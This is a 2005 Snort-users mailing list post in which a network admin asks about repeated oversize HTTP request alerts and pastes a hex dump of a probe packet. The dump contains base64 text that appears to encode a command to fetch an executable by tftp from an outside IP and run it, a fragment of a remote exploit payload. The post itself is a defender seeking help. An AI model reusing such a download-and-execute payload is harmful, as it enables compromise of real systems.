[Snort-users] [http-inspect/SPNEGO]

Gregory D Hough mr6re9 at ...6025...
Mon Jun 20 09:19:09 EDT 2005


Gregory D Hough wrote:

> Snortsters,
>
> I have been getting gobs of OVERSIZE REQUST-URI DIRECTORY alerts 
> lately, since about June 03. HTTPD would answer these requests with a 
> code 200 and serve my index page. I didn't like that so I configured 
> Apache to respond with a 400 by use of the directive 
> LimitRequestFieldsize 2048. Since then these requests have been 
> morphing whereby the continuation packet size has been growing and 
> shrinking.
>
> Am I just losing my marbles? What is this thing anyway? Do I have 
> packets? Yes, lot's.
>
> Thanks,
> farmer6re9

I realize this is just a little insignificant $HOME_NET I'm watching 
here. And that I probaly don't have to worry about this goonine tool 
poking around, but I am curious to what it is. Especially when the 
probes have increased fourfold in the last week. They generally all look 
much the same except in this portion of a continuation packet:

0130  74 5a 43 41 76 59 79 42 30 5a 6e 52 77 49 43 31   tZCAvYyB0ZnRwIC1
0140  70 49 44 49 79 4d 43 34 78 4f 44 67 75 4d 54 51   pIDIyMC4xODguMTQ
0150  34 4c 6a 45 79 4e 53 42 48 52 56 51 67 64 32 4e   4LjEyNSBHRVQgd2N
0160  7a 62 6d 5a 30 65 53 35 6c 65 47 55 6d 63 33 52   zbmZ0eS5leGUmc3R
0170  68 63 6e 51 67 64 32 4e 7a 62 6d 5a 30 65 53 35   hcnQgd2NzbmZ0eS5
0180  6c 65 47 55 6d 5a 58 68 70 64 41 42 43 51 6b 4a   leGUmZXhpdABCQkJ
0190  43 51 6b 4a 43 51 6b 4a 43 51 6b 4a 43 51 6b 4a   CQkJCQkJCQkJCQkJ

Does it have a name so I can google-it? I'd call it POKER-FACE because 
of all the Queen-King-Jack-Cards in its Data-Deck.

Please help, I'm getting straight flushed.

Thanks,
farmer6re9




More information about the Snort-users mailing list